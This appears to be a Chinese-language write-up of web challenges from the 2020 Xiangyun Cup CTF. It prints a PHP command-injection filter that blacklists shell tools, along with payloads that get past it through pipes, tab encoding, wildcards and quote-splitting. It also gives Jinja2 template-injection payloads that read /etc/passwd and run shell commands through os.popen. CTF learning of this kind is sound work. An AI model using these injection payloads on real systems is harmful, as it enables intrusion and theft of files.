其他分享
首页 > 其他分享> > 2020祥云杯网络安全大赛 WEB Writeup

2020祥云杯网络安全大赛 WEB Writeup

作者:互联网

文章目录


Command

命令执行绕过
在这里插入图片描述

<?php
error_reporting(0);
if (isset($_GET['url'])) {
  $ip=$_GET['url'];
  if(preg_match("/(;|'| |>|]|&| |\\$|python|sh|nc|tac|rev|more|tailf|index|php|head|nl|tail|less|cat|ruby|perl|bash|rm|cp|mv|\*|\{)/i", $ip)){
      die("<script language='javascript' type='text/javascript'>
      alert('no no no!')
      window.location.href='index.php';</script>");
  }else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
      die("<script language='javascript' type='text/javascript'>
      alert('no flag!')
      window.location.href='index.php';</script>");
  }
  $a = shell_exec("ping -c 4 ".$ip);
}
?>

读根目录

?url=1%7Cls%09-lha%09/

在这里插入图片描述
没发现flag,读/etc时发现一个.findflag的隐藏文件夹

?url=1%7Cls%09-lha%09/etc

在这里插入图片描述
这里flag字样都是被过滤的

preg_match("/.*f.*l.*a.*g.*/", $ip)

使用通配符绕过,但是*被过滤了,使用?

?url=1%7Cls%09-lha%09/etc/.find????

在这里插入图片描述
再读flag.txt文件,这里绝大部分读取文件命令都被过滤了,可以使用类似ca""t在命令中加入双引号绕过执行

?url=1%7Cca""t%09/etc/.find????/????.txt

在这里插入图片描述

flaskbot

在这里插入图片描述
在url后面和Cookie中随便加点什么使得路由报错,这里开启了调试模式,会回显报错代码

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在输入用户名之后,用户名会被放在Cookie中并进行渲染,只需要我们输入的num全部大于程序给出的值,这里就可以使用NANINF去比较,但是这里INF太大了,有限制,所以只能用NAN去比较

在这里插入图片描述
接下来对user参数进行注入,使用burp在输入数字进行比较的时候抓包,修改Cookie中的user就行,对payload编码一下就行

查看基类

{{''.__class__.__mro__[2]}}

在这里插入图片描述
查看所有子类

{{''.__class__.__mro__[2].__subclasses__()}}

在这里插入图片描述
读取/etc/passwd

{{[].__class__.__bases__[0].__subclasses__()[40]('/etc/passwd').read()}}

在这里插入图片描述
可以读取文件了就肯定要读一下源码,在之前的报错中已经回显出了源码的绝对路径

{{[].__class__.__bases__[0].__subclasses__()[40]('/usr/local/lib/python2.7/site-packages/flask/app.py').read()}}

在这里插入图片描述
执行命令,测试的时候发现有过滤,拼接一下绕过即可

{{''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['ev'+'al']('__imp'+'ort__("o'+'s").po'+'pen("id").read()')}}

在这里插入图片描述
读取根目录,发现flag

{{''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['ev'+'al']('__imp'+'ort__("o'+'s").po'+'pen("ls /").read()')

在这里插入图片描述

{{''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['ev'+'al']('__imp'+'ort__("o'+'s").po'+'pen("cat /super_secret_fl'+'ag.txt").read()')}}

在这里插入图片描述

easygogogo

这题有点迷,我也不知道这样解出来是预期解还是非预期解

在这里插入图片描述
登录之后有个上传和展示的操作,在上传完之后会根据上传的文件名和用户名给出一个cookie,然后展示的时候从cookie中读取文件名展示,目录路径可控并且可以路径穿越,但是上传之后每个文件都会分配一串md5,展示的时候应该会检查这串md5,所以在测试的时候无论怎样修改目录都无法跳出web根目录,然后在容器重新下发的时候,当我给这个容器使用上一个容器构造的cookie时,发现竟然就能读取到flag了。。。。。。。

首先获取读取可以flag文件Cookie
在这里插入图片描述
然后重新下发容器,随便上传一个文件,再抓展示的包,填上之前的Cookie

在这里插入图片描述
在这里插入图片描述

doyouknowssrf

easyzzz

profile system

标签:__,WEB,.__,Writeup,09,__.__,flag,2020,class
来源: https://blog.csdn.net/mochu7777777/article/details/109923678